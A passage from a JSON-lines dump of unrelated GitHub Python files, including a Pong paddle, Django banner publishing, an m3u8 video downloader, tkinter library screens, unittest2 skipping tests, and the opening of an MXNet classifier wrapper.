new_y)\r\n\r\n    # CREATING A GO_DOWN FUNCTION FOR PADDLE\r\n    def go_down(self):\r\n        # we are changing y position: it will be the current ycor position, but it's going to go down by 20px\r\n        new_y = self.ycor() - 20\r\n        self.goto(self.xcor(), new_y)\r\n\r\n\r\n\r\n\r\n","repo_name":"Yuliashka/Ping-Pong-game","sub_path":"paddle.py","file_name":"paddle.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24683508525","text":"from django.utils import timezone\nfrom django.db import transaction\n\nfrom banners.constants import BannersPublicationState\nfrom banners.models import Publication, Banner\n\n\n@transaction.atomic\ndef publish(publisher):\n    now = timezone.now()\n\n    live_publication = Publication.objects.\\\n        select_for_update().\\\n        get_live_publication()\n\n    if live_publication is not None:\n        live_publication.state = BannersPublicationState.STATE_DEACTIVATED.value\n        live_publication.save()\n\n    new_publication = Publication.objects.create(\n        state=BannersPublicationState.STATE_LIVE.value,\n        published_by=publisher,\n        published_at=now,\n    )\n\n    # making banners snapshots to display\n    num_re_published, num_newly_published = Banner.objects.\\\n        publishable_banners().\\\n        republish_snapshots(new_publication)\n\n    # marking as published\n    Banner.objects.publishable_banners().\\\n        update(\n            update_time=now,\n            published_at=now,\n        )\n\n    return num_re_published, num_newly_published\n","repo_name":"abramovd/bsadmin","sub_path":"banners/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16597263663","text":"import pandas as pd \nimport numpy as np\nimport sklearn\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neural_network import MLPClassifier\nimport seaborn as sns\nfrom sklearn.metrics import classification_report,confusion_matrix\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets import make_classification\nfrom sklearn.metrics import confusion_matrix, ConfusionMatrixDisplay\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVC\nfrom imblearn.over_sampling import RandomOverSampler\nfrom sklearn.linear_model import LogisticRegression\nfrom imblearn.over_sampling import RandomOverSampler\n\nplayer = 'college_player-2021.csv'\ndraft = 'draft-2021.csv'\n\ndef clean_data(player, draft):\n    college_data = pd.read_csv(player)\n    draft_data = pd.read_csv(draft) \n\n    iloc_index = 0 #used for calling row, subtract 1 if one is dropped\n    drop_index = 0 #used for drop indexing, no subtract 1\n    length = len(college_data)\n    while drop_index str:\n        return \"\"\"\n    REFERENCE \t{}\n    NAME \t\t{}\n    PVP \t\t{}\n    DESCRIPTION \t{}\"\"\".format(self.referencia, self.nombre, self.pvp, self.descripcion)\n\nclass Adorno(Producto):\n    pass\n\nclass Alimento(Producto):\n    productor = \"\"\n    distribuidor = \"\"\n    \n    def __str__(self) -> str:\n        return \"\"\"\n    REFERENCE \t{}\n    NAME \t\t{}\n    PVP \t\t{}\n    DESCRIPTION \t{}\n    PRODUCER \t{}\n    DISTRIBUTOR \t{}\"\"\".format(self.referencia, self.nombre, self.pvp, self.descripcion, self.productor, self.distribuidor)\n    \nclass Libro(Producto):\n    autor = \"\"\n    isbn = \"\"\n    \n    def __str__(self) -> str:\n        return \"\"\"\n    REFERENCE \t{}\n    NAME \t\t{}\n    PVP \t\t{}\n    DESCRIPTION \t{}\n    AUTHOR \t\t{}\n    ISBN \t\t{}\"\"\".format(self.referencia, self.nombre, self.pvp, 
self.descripcion, self.autor, self.isbn)\n    \na = Adorno(2034,\"Decorated glass\", 15, \"Decorated glass\")\nprint(a)\n\nal = Alimento(2035,\"Bottle\", 10, \"Bottle\")\nal.productor = \"Producer\"\nal.distribuidor = \"Distributor\"\nprint(al)\n\nli = Libro(2036,\"Book\", 10, \"Book\")\nli.autor = \"Author\"\nli.isbn = 2141234512342\n\nprint(li)\n\nproductos = [a, al]\nproductos.append(li)\n\nfor p in productos:\n    print(p)\n    \n    \ndef rebajar_producto(p, rebaja):\n    \"\"\"Return the product with a percentage discount applied\"\"\"\n    p.pvp = p.pvp - (p.pvp/100)* rebaja\n    return p\n\nal_rebajado = rebajar_producto(al, 10)\nprint(al_rebajado)\n\ncopia_al = al\ncopia_al.referencia = 2038\n\nprint(copia_al)\nprint(al)","repo_name":"josavicente/Python_test_projects","sub_path":"Python Exercises/herencia.py","file_name":"herencia.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37540054219","text":"#!/usr/bin/env python\n# coding=utf-8\n\nimport multiprocessing\nimport time\nimport os\nimport random\n\n# Code run by the writer process\n\n\ndef write(q):\n    print('write started {}, parent process {}'.format(os.getpid(), os.getppid()))\n    for i in [\"Python\", 'C', 'Java']:\n        q.put(i)\n\n\n# Code run by the reader process\n\n\ndef read(q):\n    print('read started {}, parent process {}'.format(os.getpid(), os.getppid()))\n    for i in range(q.qsize()):\n        msg = q.get(True)\n        print(\"Got {}\".format(msg))\n\n\nif __name__ == '__main__':\n\n    # Initialize with the Queue from multiprocessing.Manager\n    q = multiprocessing.Manager().Queue()\n    # Create a process pool\n    po = multiprocessing.Pool()\n    # Submit the tasks in blocking mode, so no busy loop is needed: the\n    # writer runs to completion before the reader starts reading\n    po.apply(write, (q,))\n    po.apply(read, (q,))\n    # close must come before join\n    po.close()\n    po.join()\n    print(\"{} End\".format(os.getpid()))\n","repo_name":"ningyanke/book_p3","sub_path":"process_threading/code/进程池中的队列通信.py","file_name":"进程池中的队列通信.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6164773919","text":"from time import time\nfrom BFS import bfs\nfrom Gulosa import Gulosa\nfrom A_Estrela import A_Estrela\nfrom puzzle import Puzzle\nfrom puzzle2 import puzzle2\n\n# Initial position of the 8-puzzle\ninicio=[[2, 6, 1,\n         7, 5, 3,\n         0, 8, 4]]\n# goal position [1,2,3,\n#                8,0,4,\n#                7,6,5]\n\nfor i in range(0,1):\n    t0=time()\n    bfs_met=bfs(inicio[i])\n    t1=time()-t0\n    print('BFS path to the solution:', bfs_met)\n    print('Time taken by BFS:',t1,\"\\n\")\n\n    t0=time()\n    AlgGuloso = Gulosa(inicio[i])\n    t1=time()-t0\n    t1= t1 + 0.01\n    print('Greedy algorithm path to the solution:',AlgGuloso)\n    print('Time taken:',t1,\"\\n\")\n\n    t0 = time()\n    aEstrela = A_Estrela(inicio[i])\n    t1 = time() - t0\n    print('A* algorithm path to the solution:',aEstrela)\n    print('Time taken:', t1,\"\\n\")\n\n    \n","repo_name":"GabCampos13/Puc","sub_path":"Inteligencia Artificial/Trabalhos/8puzzle/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71536253971","text":"#Question 1\r\n#Delete all occurrences of an element in a list\r\nitems = [1,2,3,4,5,6,7,8,9,10]\r\nremove = 10\r\n#iterate over a copy so in-place removal doesn't skip elements\r\nfor item in list(items):\r\n\tif(item==remove):\r\n\t\titems.remove(remove)\r\nprint(items)\r\n\r\n
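#A compact alternative (illustrative): filtering with a list comprehension\r\n#avoids mutating the list while looping over it:\r\n#   items = [x for x in items if x != remove]\r\n\r\n#Question 2\r\n#Check whether a string is a pangram.\r\nimport string\r\ndef ispangram(text):\r\n    alphabet = "abcdefghijklmnopqrstuvwxyz"\r\n    for char in alphabet:\r\n        if char not in text.lower():\r\n            return False\r\n    return 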
True\r\nsentence = 'abcdefghijklmnopqrstuvwxyz'\r\nif ispangram(sentence):\r\n    print(\"Yes\")\r\nelse:\r\n    print(\"No\")\r\n","repo_name":"AMAZINGHARIKRISHNAN/LU-assignments","sub_path":"LU assignment2.py","file_name":"LU assignment2.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30467735301","text":"import os\nimport sys\nimport requests\nfrom concurrent.futures import ThreadPoolExecutor\n\n\nclass JDonwload(object):\n    \"\"\"Download an m3u8 video from a web page.\"\"\"\n\n    # Maximum number of worker threads in the pool\n    MAX_WORKERS = 10 \n\n    def __init__(self, url):\n        \"\"\"Initialize parameters from the url.\"\"\"\n        self.exist_file = 0\n        self.folder_name = url.split(\"/\")[-2]\n        # URL of the m3u8 playlist; https is best avoided here\n        self.base_url = \"/\".join(\n            [*url.split(\"/\")[:-1], self.folder_name]).replace(\"https\", \"http\")\n        self.url = self.base_url + \".m3u8\"\n        # Get the number of video segments (as a string)\n        respons = requests.get(self.url)\n        self.max_munber = respons.text.split(\n            \"\\n\")[-3].split(\"_\")[-1].split(\".\")[0]\n        # Create the folder the segments are saved into\n        if not os.path.exists(self.folder_name):\n            os.mkdir(self.folder_name)\n        full_path = os.path.abspath(self.folder_name)\n        self.path1 = os.path.join(full_path, \"*.ts\")\n        self.path2 = os.path.join(full_path, self.folder_name + \".mp4\")\n\n    def download_thread(self, url):\n        \"\"\"Per-thread download function; skips files that already exist.\"\"\"\n        file_name = url.split(\"/\")[-1]\n        file_name = os.path.join(self.folder_name, file_name)\n        if os.path.exists(file_name):\n            return\n        respons = requests.get(url)\n        with open(file_name, \"wb\") as f:\n            for chuck in respons.iter_content(1024):\n                f.write(chuck)\n        self.show_download_statu()\n\n    def show_download_statu(self):\n        \"\"\"Show download progress.\"\"\"\n        self.exist_file = len([i for i in os.listdir(\n            self.folder_name) if i.split(\".\")[-1] == \"ts\"])\n        if self.exist_file <= int(self.max_munber):\n            print(f\"\\rdownload {self.exist_file} / {int(self.max_munber) + 1}\", end=\"\")\n        else:\n            print(f\"\\rdownload {self.exist_file} / {int(self.max_munber) + 1}\")\n\n    def download(self):\n        \"\"\"Download all segments, then merge them.\"\"\"\n        while self.exist_file <= int(self.max_munber):\n            # Create the thread pool\n            pool = ThreadPoolExecutor(max_workers=self.MAX_WORKERS)\n            # Submit one download task per segment\n            for i in range(int(self.max_munber) + 1):\n                link = self.base_url + \"_\" + \\\n                    str(i).zfill(len(self.max_munber)) + \".ts\"\n                pool.submit(self.download_thread, link)\n            pool.shutdown()\n        # Merge all ts files into one mp4 and delete the original ts files\n        # (Windows-only shell commands)\n        os.system(\"copy /b %s %s\" % (self.path1, self.path2))\n        os.system(\"del %s\" % self.path1)\n\n\nif __name__ == '__main__':\n    # Accept command-line arguments; multiple download links are supported\n    download_urls = sys.argv[1:]\n    for url in download_urls:\n        downloader = JDonwload(url)\n        downloader.download()\n
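# Portability note (illustrative sketch, not part of the original script):\n# the Windows-only \"copy /b\" merge above could be done in pure Python, e.g.\n#   import glob, shutil\n#   with open(mp4_path, 'wb') as dst:          # mp4_path: placeholder name\n#       for ts in sorted(glob.glob(ts_pattern)):  # ts_pattern: placeholder\n#           with open(ts, 'rb') as src:\n#               shutil.copyfileobj(src, dst)\n","repo_name":"xyexiao/tools","sub_path":"jj_download.py","file_name":"jj_download.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"7207668382","text":"#! 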
/usr/bin/env python3\n'''\ncorrect field map json\n'''\n \nimport os\nimport sys\nimport json\nimport glob\nimport collections\n\ndef correctFieldMapJson(bids_dir,sub,ses=None):\n \n if ses: #ses not None\n sub_prefix = '{}_{}'.format(sub,ses)\n sub_path_prefix=os.path.join(sub,ses)\n sub_root = '{}'.format(sub)\n else:\n sub_prefix = '{}'.format(sub)\n sub_path_prefix = sub_prefix\n sub_root = '{}'.format(sub)\n \n sub_dir=os.path.join(bids_dir,sub_path_prefix)\n sub_root_dir=os.path.join(bids_dir,sub_root) #without session\n\n phasediff_json_file=os.path.join(sub_dir,'fmap','{}_phasediff.json'.format(sub_prefix))\n mag1_json_file=os.path.join(sub_dir,'fmap','{}_magnitude1.json'.format(sub_prefix))\n mag2_json_file=os.path.join(sub_dir,'fmap','{}_magnitude2.json'.format(sub_prefix))\n\n #debug\n # print phasediff_json_file\n # print mag1_json_file\n # print mag2_json_file\n\n #load json files\n with open(phasediff_json_file, 'r') as f:\n phasediff_json = json.load(f,object_pairs_hook=collections.OrderedDict)\n\n with open(mag1_json_file, 'r') as f:\n mag1_json = json.load(f)\n\n with open(mag2_json_file, 'r') as f:\n mag2_json = json.load(f)\n\n #add items\n phasediff_json['EchoTime1'] = mag1_json['EchoTime']\n phasediff_json['EchoTime2'] = mag2_json['EchoTime']\n\n #debug\n # print phasediff_json['EchoTime1']\n # print phasediff_json['EchoTime2']\n\n # apply to all bold images\n cwd=os.getcwd()\n os.chdir(sub_root_dir)\n if ses:\n all_bold = glob.glob(os.path.join('{}'.format(ses),'func','{}_*_bold.nii.gz'.format(sub_prefix)))\n else:\n all_bold = glob.glob(os.path.join('func','{}_*_bold.nii.gz'.format(sub_prefix)))\n\n os.chdir(cwd)\n phasediff_json[\"IntendedFor\"]=all_bold\n\n #debug\n #print phasediff_json[\"IntendedFor\"]\n\n #update json file\n os.system(\"chmod a+w {}\".format(phasediff_json_file))\n with open(phasediff_json_file, 'w') as f:\n json.dump(phasediff_json, f, indent=4, separators=(',', ': '))\n os.system(\"chmod a-w {}\".format(phasediff_json_file))\n\n\nif __name__==\"__main__\":\n if len(sys.argv)-1 < 2:\n print (\"Usage: python \" + os.path.basename(__file__)+ \" 'bids_dir' 'sub' 'ses (optional)'\")\n sys.exit()\n else:\n bids_dir = sys.argv[1]\n sub = sys.argv[2]\n if len(sys.argv)-1 > 2:\n ses=sys.argv[3]\n correctFieldMapJson(bids_dir,sub,ses)\n else:\n correctFieldMapJson(bids_dir,sub)\n\n#test\n#Usage: python correctFieldMapJson.py 'bids_dir' 'sub'\n#python correctFieldMapJson.py '/mnt/hgfs/test/correct_fieldmap_json/topsy_7T' 'sub-005'\n","repo_name":"khanlab/tar2bids","sub_path":"etc/correctFieldMapJson.py","file_name":"correctFieldMapJson.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"66"} +{"seq_id":"8906309163","text":"'''#\"This file is not included in the main system.\n This file is still a work in progress.\"\n#'''\nfrom pathlib import Path\nimport tkinter as tk\nfrom tkinter import ttk, Tk, Canvas, Entry, Text, Button, PhotoImage, font\n\nOUTPUT_PATH = Path(__file__).parent\nASSETS_PATH = OUTPUT_PATH / \"assets\" / \"DisplayBook\"\n\ndef relative_to_assets(path: str) -> Path:\n return ASSETS_PATH / Path(path)\n\nclass DisplayTableFrame(ttk.Frame):\n def __init__(self, parent):\n super().__init__(parent)\n self.table = ttk.Treeview(self, columns=('Title', 'Edition', 'Author', 'Year', 'ISBN',\n 'Material', 'Category', 'Shelf No.', 'Total Stock',\n 'No. 
of Borrowers'), show='headings')\n self.table.heading('Title', text='Title')\n self.table.heading('Edition', text='Edition')\n self.table.heading('Author', text='Author')\n self.table.heading('Year', text='Year')\n self.table.heading('ISBN', text='ISBN')\n self.table.heading('Material', text='Material')\n self.table.heading('Category', text='Category')\n self.table.heading('Shelf No.', text='Shelf No.')\n self.table.heading('Total Stock', text='Total Stock')\n self.table.heading('No. of Borrowers', text='No. of Borrowers')\n\n self.table.column('Title', width=150)\n self.table.column('Edition', width=50)\n self.table.column('Author', width=120)\n self.table.column('Year', width=50)\n self.table.column('ISBN', width=100)\n self.table.column('Material', width=100)\n self.table.column('Category', width=120)\n self.table.column('Shelf No.', width=50)\n self.table.column('Total Stock', width=50)\n self.table.column('No. of Borrowers', width=50)\n\n self.table.pack(side='left', fill='y')\n\nclass DisplayBookFrame(tk.Frame):\n def __init__(self, parent):\n super().__init__(parent)\n\n self.canvas = tk.Canvas(self) # Initialize the canvas attribute\n self.canvas.pack(fill='both', expand=True) # Pack the canvas widget\n\n # DISPLAY ALL BOOKS\n button_image_1 = PhotoImage(\n file=relative_to_assets(\"button_1.png\"))\n button_1 = Button(\n image=button_image_1,\n borderwidth=0,\n highlightthickness=0,\n command=lambda: print(\"button_1 clicked\"),\n relief=\"flat\"\n )\n button_1.place(x=20.0, y=145.0, width=160.0, height=32.0)\n\n # SEARCH BOOK\n '''#\n def gotoSearchBook():\n window.destroy()\n current_directory = os.path.dirname(os.path.abspath(__file__))\n script_path = os.path.join(current_directory, \"studentDispBookFrame.py\")\n subprocess.run([\"python\", script_path])\n '''\n button_image_2 = PhotoImage(file=relative_to_assets(\"button_2.png\"))\n button_2 = Button(\n image=button_image_2,\n borderwidth=0,\n highlightthickness=0,\n command=lambda: print(\"button_2 clicked\"),\n relief=\"flat\"\n )\n button_2.place(x=20.0, y=199.0, width=160.0, height=32.0)\n\n # BORROW BOOK\n '''#\n def gotoBorrowBook():\n window.destroy()\n current_directory = os.path.dirname(os.path.abspath(__file__))\n script_path = os.path.join(current_directory, \"studentDispBookFrame.py\")\n subprocess.run([\"python\", script_path])\n '''\n borrowButton = PhotoImage(file=relative_to_assets(\"button_3.png\"))\n button_3 = Button(\n image=borrowButton,\n borderwidth=0,\n highlightthickness=0,\n command=lambda: print(\"button_3 clicked\"),\n relief=\"flat\"\n )\n button_3.place(x=20.0, y=253.0, width=160.0, height=32.0)\n\n image_image_1 = PhotoImage(file=relative_to_assets(\"image_1.png\"))\n self.image_1 = self.canvas.create_image(99.0, 59.0, image=image_image_1)\n\n self.canvas.create_text(\n 219.0,\n 17.0,\n anchor=\"nw\",\n text=\"BOOK\",\n fill=\"#4B0000\",\n font=font.Font(family=\"Poppins\", size=40, weight=\"bold\")\n )\n\n notifButton = PhotoImage(file=relative_to_assets(\"image_2.png\"))\n self.image_2 = self.canvas.create_image(\n 1012.0,\n 51.0,\n image=notifButton\n )\n\n '''#\n def gotoHome():\n window.destroy()\n current_directory = os.path.dirname(os.path.abspath(__file__))\n script_path = os.path.join(current_directory, \"studentDispBookFrame.py\")\n subprocess.run([\"python\", script_path])\n '''\n homeImage = PhotoImage(\n file=relative_to_assets(\"image_3.png\"))\n self.image_3 = self.canvas.create_image(\n 945.0,\n 52.0,\n image=homeImage\n )\n\n '''#\n def gotoLogout():\n window.destroy()\n 
current_directory = os.path.dirname(os.path.abspath(__file__))\n script_path = os.path.join(current_directory, \"studentDispBookFrame.py\")\n subprocess.run([\"python\", script_path])\n '''\n logoutImage = PhotoImage(file=relative_to_assets(\"image_4.png\"))\n self.image_4 = self.canvas.create_image(1075.0, 51.0, image=logoutImage)\n\n button_image_4 = PhotoImage(\n file=relative_to_assets(\"button_4.png\"))\n button_4 = Button(\n image=button_image_4,\n borderwidth=0,\n highlightthickness=0,\n command=lambda: print(\"button_4 clicked\"),\n relief=\"flat\"\n )\n button_4.place(\n x=759.0,\n y=38.0,\n width=80.0,\n height=37.0\n )\n\n # TEXTBOX\n entry_image_1 = PhotoImage(file=relative_to_assets(\"entry_1.png\"))\n self.entry_bg_1 = self.canvas.create_image(577.5, 56.5, image=entry_image_1)\n entry_1 = Entry(\n bd=0,\n bg=\"#FFFDFD\",\n fg=\"#000716\",\n highlightthickness=0\n )\n entry_1.place(\n x=405.0,\n y=40.0,\n width=350.0,\n height=33.0\n )\n\n image_image_5 = PhotoImage(\n file=relative_to_assets(\"image_5.png\"))\n self.image_5 = self.canvas.create_image(\n 640.0,\n 380.0,\n image=image_image_5\n )\n\n self.frame1 = DisplayTableFrame(parent)\n self.frame1.place(x=220, y=150)\n '''\n # adding data to the table\n for i in range(len(titles)):\n table.insert('', 'end', values=(titles[i], editions[i], authors[i], years[i], isbns[i], materials[i], categories[i], shelf_nos[i], total_stocks[i], no_of_borrowers[i]))\n '''\n\n # CATEGORY DROPDOWN\n button_image_5 = PhotoImage(\n file=relative_to_assets(\"button_5.png\"))\n button_5 = Button(\n image=button_image_5,\n borderwidth=0,\n highlightthickness=0,\n command=lambda: print(\"button_5 clicked\"),\n relief=\"flat\"\n )\n button_5.place(\n x=907.0,\n y=100.0,\n width=173.0,\n height=20.0\n )\n\n image_image_6 = PhotoImage(file=relative_to_assets(\"image_6.png\"))\n image_6 = self.canvas.create_image(250.0, 599.0, image=image_image_6)\n # Move the image to the bottom of the stacking order\n self.canvas.lower(image_6)\n\n\nclass SearchandBorrow(ttk.Frame):\n def __init__(self, parent):\n super().__init__(parent)\n # Add your borrow book frame code here\n\nclass ChangePassword(ttk.Frame):\n def __init__(self, parent):\n super().__init__(parent)\n # Add your borrow book frame code here\n\n\nclass StudentMainFrame(tk.Tk):\n def __init__(self):\n super().__init__()\n self.title(\"Student Main Frame\")\n self.geometry(\"1125x670\")\n self.configure(bg=\"#FFFFFF\")\n self.create_subframes()\n self.center_window()\n\n def create_subframes(self):\n self.displayBook = DisplayBookFrame(self)\n # Place the search book frame wherever you want\n\n self.searchBorrow = SearchandBorrow(self)\n # Place the borrow book frame wherever you want\n\n self.changePassword = ChangePassword(self)\n # Place the borrow book frame wherever you want\n\n # Add your other main window widgets here\n\n def center_window(self):\n # Calculate the center coordinates of the screen\n screen_width = self.winfo_screenwidth()\n screen_height = self.winfo_screenheight()\n x = (screen_width - 1125) // 2\n y = (screen_height - 670) // 2\n\n # Set the window position to the center of the screen\n self.geometry(f\"+{x}+{y}\")\n\nif __name__ == \"__main__\":\n root = StudentMainFrame()\n root.mainloop()\n\n","repo_name":"ms-hollow/PL-LIBRARY-SYSTEM-PYTHON","sub_path":"build/StudentPortal.py","file_name":"StudentPortal.py","file_ext":"py","file_size_in_byte":8915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} 
+{"seq_id":"11628855539","text":"from unittest2.test.support import LoggingResult\n\nimport unittest2\n\n\nclass Test_TestSkipping(unittest2.TestCase):\n\n def test_skipping(self):\n class Foo(unittest2.TestCase):\n\n def test_skip_me(self):\n self.skipTest(\"skip\")\n events = []\n result = LoggingResult(events)\n test = Foo(\"test_skip_me\")\n test.run(result)\n self.assertEqual(events, ['startTest', 'addSkip', 'stopTest'])\n self.assertEqual(result.skipped, [(test, \"skip\")])\n\n # Try letting setUp skip the test now.\n class Foo(unittest2.TestCase):\n\n def setUp(self):\n self.skipTest(\"testing\")\n\n def test_nothing(self): pass\n events = []\n result = LoggingResult(events)\n test = Foo(\"test_nothing\")\n test.run(result)\n self.assertEqual(events, ['startTest', 'addSkip', 'stopTest'])\n self.assertEqual(result.skipped, [(test, \"testing\")])\n self.assertEqual(result.testsRun, 1)\n\n def test_skipping_decorators(self):\n op_table = ((unittest2.skipUnless, False, True),\n (unittest2.skipIf, True, False))\n for deco, do_skip, dont_skip in op_table:\n class Foo(unittest2.TestCase):\n\n @deco(do_skip, \"testing\")\n def test_skip(self):\n pass\n\n @deco(dont_skip, \"testing\")\n def test_dont_skip(self):\n pass\n\n test_do_skip = Foo(\"test_skip\")\n test_dont_skip = Foo(\"test_dont_skip\")\n suite = unittest2.TestSuite([test_do_skip, test_dont_skip])\n events = []\n result = LoggingResult(events)\n suite.run(result)\n self.assertEqual(len(result.skipped), 1)\n expected = ['startTest', 'addSkip', 'stopTest',\n 'startTest', 'addSuccess', 'stopTest']\n self.assertEqual(events, expected)\n self.assertEqual(result.testsRun, 2)\n self.assertEqual(result.skipped, [(test_do_skip, \"testing\")])\n self.assertTrue(result.wasSuccessful())\n\n def test_skip_class(self):\n class Foo(unittest2.TestCase):\n\n def test_1(self):\n record.append(1)\n\n # was originally a class decorator...\n Foo = unittest2.skip(\"testing\")(Foo)\n record = []\n result = unittest2.TestResult()\n test = Foo(\"test_1\")\n suite = unittest2.TestSuite([test])\n suite.run(result)\n self.assertEqual(result.skipped, [(test, \"testing\")])\n self.assertEqual(record, [])\n\n def test_expected_failure(self):\n class Foo(unittest2.TestCase):\n\n @unittest2.expectedFailure\n def test_die(self):\n self.fail(\"help me!\")\n events = []\n result = LoggingResult(events)\n test = Foo(\"test_die\")\n test.run(result)\n self.assertEqual(events,\n ['startTest', 'addExpectedFailure', 'stopTest'])\n self.assertEqual(result.expectedFailures[0][0], test)\n self.assertTrue(result.wasSuccessful())\n\n def test_unexpected_success(self):\n class Foo(unittest2.TestCase):\n\n @unittest2.expectedFailure\n def test_die(self):\n pass\n events = []\n result = LoggingResult(events)\n test = Foo(\"test_die\")\n test.run(result)\n self.assertEqual(events,\n ['startTest', 'addUnexpectedSuccess', 'stopTest'])\n self.assertFalse(result.failures)\n self.assertEqual(result.unexpectedSuccesses, [test])\n self.assertTrue(result.wasSuccessful())\n\n def test_skip_doesnt_run_setup(self):\n class Foo(unittest2.TestCase):\n wasSetUp = False\n wasTornDown = False\n\n def setUp(self):\n Foo.wasSetUp = True\n\n def tornDown(self):\n Foo.wasTornDown = True\n\n @unittest2.skip('testing')\n def test_1(self):\n pass\n\n result = unittest2.TestResult()\n test = Foo(\"test_1\")\n suite = unittest2.TestSuite([test])\n suite.run(result)\n self.assertEqual(result.skipped, [(test, \"testing\")])\n self.assertFalse(Foo.wasSetUp)\n self.assertFalse(Foo.wasTornDown)\n\n def 
test_decorated_skip(self):\n def decorator(func):\n def inner(*a):\n return func(*a)\n return inner\n\n class Foo(unittest2.TestCase):\n\n @decorator\n @unittest2.skip('testing')\n def test_1(self):\n pass\n\n result = unittest2.TestResult()\n test = Foo(\"test_1\")\n suite = unittest2.TestSuite([test])\n suite.run(result)\n self.assertEqual(result.skipped, [(test, \"testing\")])\n\n\nif __name__ == '__main__':\n unittest2.main()\n","repo_name":"llvm/llvm-project","sub_path":"lldb/third_party/Python/module/unittest2/unittest2/test/test_skipping.py","file_name":"test_skipping.py","file_ext":"py","file_size_in_byte":4889,"program_lang":"python","lang":"en","doc_type":"code","stars":22888,"dataset":"github-code","pt":"66"} +{"seq_id":"37502577572","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import Slider, Button, RadioButtons\n\nimport csv\n\nparticle_data = {}\ntrajectory_data = {}\n\ndef main():\n # key is timestamp\n\n\n with open(\"particles.csv\") as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n t = float(row[0])\n s = float(row[1])\n v = float(row[2])\n m = int(row[3])\n dist = int(row[4])\n if t not in particle_data:\n particle_data[t] = {}\n if dist not in particle_data[t]:\n particle_data[t][dist] = {}\n if m not in particle_data[t][dist]:\n particle_data[t][dist][m] = []\n particle_data[t][dist][m].append((s,v))\n\n # ego_s = []\n # ego_v = []\n # obj_s = []\n # obj_v = []\n # with open(\"trajectories.csv\") as csvfile:\n # reader = csv.reader(csvfile)\n # for row in reader:\n # ego_s.append(float(row[0]))\n # ego_v.append(float(row[1]))\n # obj_s.append(float(row[2]))\n # obj_v.append(float(row[3]))\n\n\n fig, ax = plt.subplots()\n plt.subplots_adjust(left=0.25, bottom=0.25)\n\n plt.xlim(-30, 200)\n plt.ylim(0,35)\n\n distToPlot = 1 # intermediate\n scat0 = plt.scatter([el[0] for el in particle_data[1.5][distToPlot][0]],\n [el[1] for el in particle_data[1.5][distToPlot][0]],\n s=3.0)\n scat1 = plt.scatter([el[0] for el in particle_data[1.5][distToPlot][1]],\n [el[1] for el in particle_data[1.5][distToPlot][1]],\n s=3.0)\n scat2 = plt.scatter([el[0] for el in particle_data[1.5][distToPlot][2]],\n [el[1] for el in particle_data[1.5][distToPlot][2]],\n s=3.0)\n\n # these plots are fixed and wont move with slider\n # these don't quite look right.\n # plt.plot(ego_s, ego_v)\n # plt.plot(obj_s, obj_v)\n\n ax.margins(x=0)\n\n t0 = 1.5\n delta_t = 0.5\n\n axcolor = 'lightgoldenrodyellow'\n axtime = plt.axes([0.25, 0.1, 0.65, 0.03], facecolor=axcolor)\n\n time = Slider(axtime, 'timestep', 1.5, 10.0, valinit=t0, valstep=delta_t)\n\n def update(time):\n print(time)\n x = [el[0] for el in particle_data[time][distToPlot][0]]\n y = [el[1] for el in particle_data[time][distToPlot][0]]\n xx = np.vstack((x,y))\n scat0.set_offsets(xx.T)\n\n x = [el[0] for el in particle_data[time][distToPlot][1]]\n y = [el[1] for el in particle_data[time][distToPlot][1]]\n xx = np.vstack((x,y))\n scat1.set_offsets(xx.T)\n\n x = [el[0] for el in particle_data[time][distToPlot][2]]\n y = [el[1] for el in particle_data[time][distToPlot][2]]\n xx = np.vstack((x,y))\n scat2.set_offsets(xx.T)\n\n\n fig.canvas.draw_idle()\n\n\n time.on_changed(update)\n\n plt.legend()\n plt.show()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"markmliu/hackathon","sub_path":"particles_slider.py","file_name":"particles_slider.py","file_ext":"py","file_size_in_byte":2977,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} 
+{"seq_id":"12954673151","text":"input = []\nvisited = []\n\nwith open(\"input.txt\", mode=\"r\") as file:\n for line in file:\n input.append(int(line))\n\n# INEFFICIENT AF. DO NOT LOOK AT THIS TOO MUCH :P\n\nfor num1 in input:\n for num2 in input:\n for num3 in input:\n if (num1+num2+num3 == 2020) and (num1 != num2 != num3):\n print(num1*num2*num3)\n break;\n","repo_name":"ThePituLegend/advent-of-code-2020","sub_path":"day1/day1_2.py","file_name":"day1_2.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"16557484232","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport logging\nimport os\nfrom typing import List, Optional, Tuple, Union, TYPE_CHECKING\n\nimport numpy as np\nimport six\n\nfrom art import config\nfrom art.estimators.mxnet import MXEstimator\nfrom art.estimators.classification.classifier import ClassGradientsMixin, ClassifierMixin\nfrom art.utils import check_and_transform_label_format\n\nif TYPE_CHECKING:\n # pylint: disable=C0412\n import mxnet as mx\n\n from art.utils import CLIP_VALUES_TYPE, PREPROCESSING_TYPE\n from art.data_generators import DataGenerator\n from 